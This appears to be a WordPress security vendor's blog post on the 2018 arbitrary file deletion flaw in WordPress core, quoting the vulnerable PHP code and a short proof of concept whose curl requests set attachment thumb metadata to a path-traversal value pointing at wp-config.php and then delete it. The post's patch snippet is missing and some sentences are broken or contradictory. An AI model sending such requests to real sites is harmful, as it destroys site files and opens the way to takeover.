Table of Contents [TOC]
Table Of Contents:
? Who were affected?
? How Can Hacker Exploit Arbitrary File Deletion Vulnerability In WordPress?
? Why reveal it if it’s critical?
? Where Is The Vulnerability Found?
? Arbitrary File Deletion Exploit Code
? How To Fix WordPress Arbitrary File Deletion Vulnerability?
This wide adoption makes it an interesting target for cyber criminals. RIPS Team disclosed an Arbitrary File Deletion Flaw Present in WordPress Core at Jun. 26, 2018. Karim El Ouerghemmi from RipsTech disclosed a critical flaw in WordPress allowing any author, publisher or administrator to delete any file from an installation, in any folder, without any tools.
In less than 1 minute, a site can be destroyed. The flaw is known to the security team of WordPress for about 7 months but still, no fix has been released, so Karim revealed it.(see ref’s)
The vulnerability was fixed in WordPress 4.9.7 version, ( Also See Latest WordPress Versions) released on July 5. In order to successfully exploit this issue, the attacker would need to gain access to edit and delete media files which can be achieved by taking over an Author account or by targeting sites that expose the media functionality through various plugins. Website which did not updated their WordPress versions and were still running on outdated versions with specific media plugins installed, were mostly affected by this exploit.
Unfortunately yes, in less than 1 minute an author can remove any file from the site as wp-config.php. But also an attacker could delete the main file of a security extension so that it does not load anymore to then make more serious hacking actions. Because let’s say it, breaking a site can only be of interest for a hacker to steal the data.
Attackers can leverage the way the WordPress installation mechanism works, to gain arbitrary code execution by.
You may have already watched videos of this exploit, using the JavaScript console to inject a hexadecimal code to add and call a new JS function and launch a new AJX call etc., IT’S WELL TOO, just change 2 values+ a last one that will be the path to the file to delete, that’s all.
The answer is in the question: because it’s crucial and if a security consultant can find it, a hacker too can. We (me, you) need to inform everyone about this vulnerability to show everyone that it’s easy to hack a WordPress site if you have an author/publisher/admin (other than you) on your site.
An attacker could exploit the file deletion vulnerability to delete any file of the WordPress installation, as well as any other file on the server on which the PHP process user has the proper permissions to delete.
An arbitrary file deletion flaw occurs when it is possible to pass unsanitized input to a file deletion function.
In PHP an arbitrary file deletion occurs when the unlink() function is called and user input can affect parts of or the whole parameter $filename, which is the path of the file to delete, without undergoing proper sanitization.
The flaw resides in the WordPress Core, the code to trigger it was found in the wp-includes/post.php file:
The function wp_delete_attachment() is guilty here:
function wp_delete_attachment( $post_id, $force_delete = false ) { $meta = wp_get_attachment_metadata( $post_id ); if ( ! empty($meta['thumb']) ) { // Don't delete the thumb if another attachment uses it. if (! $wpdb->get_row( $wpdb->prepare( "SELECT meta_id FROM $wpdb->postmeta WHERE meta_key = '_wp_attachment_metadata' AND meta_value LIKE %s AND post_id <> %d", '%' . $wpdb->esc_like( $meta['thumb'] ) . '%', $post_id)) ) { $thumbfile = str_replace(basename($file), $meta['thumb'], $file); /** This filter is documented in wp-includes/functions.php */ $thumbfile = apply_filters( 'wp_delete_file', $thumbfile ); @ unlink( path_join($uploadpath['basedir'], $thumbfile) ); } } }
The call to unlink () delete the file contained in the named metadata thumb. But how is this given?
Let’s see it in /wp-admin/post.php :⋮
switch($action) { ⋮ case 'editattachment': check_admin_referer('update-post_' . $post_id); ⋮ // Update the thumbnail filename $newmeta = wp_get_attachment_metadata( $post_id, true ); $newmeta['thumb'] = $_POST['thumb']; wp_update_attachment_metadata( $post_id, $newmeta ); ⋮
The metadata is just the raw value of the user’s form field, no disinfection, no filter, no escape, nothing.
WordPress 4.9.6 Arbitrary File Deletion Vulnerability
# Date: 2018-06-27
# Exploit Author: VulnSpy
# Vendor Homepage: http://www.wordpress.org
# Software Link: http://www.wordpress.org/download
# Version: <= 4.9.6
# Tested on: php7 mysql5
# CVE :
“`
curl -v 'http://localhost/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=editattachment&_wpnonce=***&thumb=../../../../wp-config.php' “`
“`
curl -v 'http://localhost/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=delete&_wpnonce=***' “`
SEE REF BELOW.
The described arbitrary file deletion vulnerability in the WordPress remains unpatched in the WordPress core as the time of writing. Because of this, team at RIPS have developed a temporary fix provided in the snipped below. To integrate this fix into an existing WordPress installation, add it to the functions.php file of the currently active theme/child-theme.
You can use the following Karim patch (with a different function name to avoid code conflicts):
| |
It hooks into the wp_update_attachement_metadata() call and makes sure that the data provided for the meta-value thumb does not contain any parts making path traversal possible. Thus, no security relevant files can be deleted.
WP hacked help is by far one of the best security scanner in the WordPress community. We protect your site against multiple attacks such as: brute force attacks, DDoS attacks, SQL injections, etc.
WP hacked help also has a firewall that analyses all visitor traffic just before it reaches your website. Hackers are blocked before they reach and hack your website.
It also has a malware scanner to scan the WordPress, themes and plugins of your WordPress site, including to detect the presence of malware.
If you are looking for a reliable and affordable way to scan and secure your WordPress website then feel free to reach us.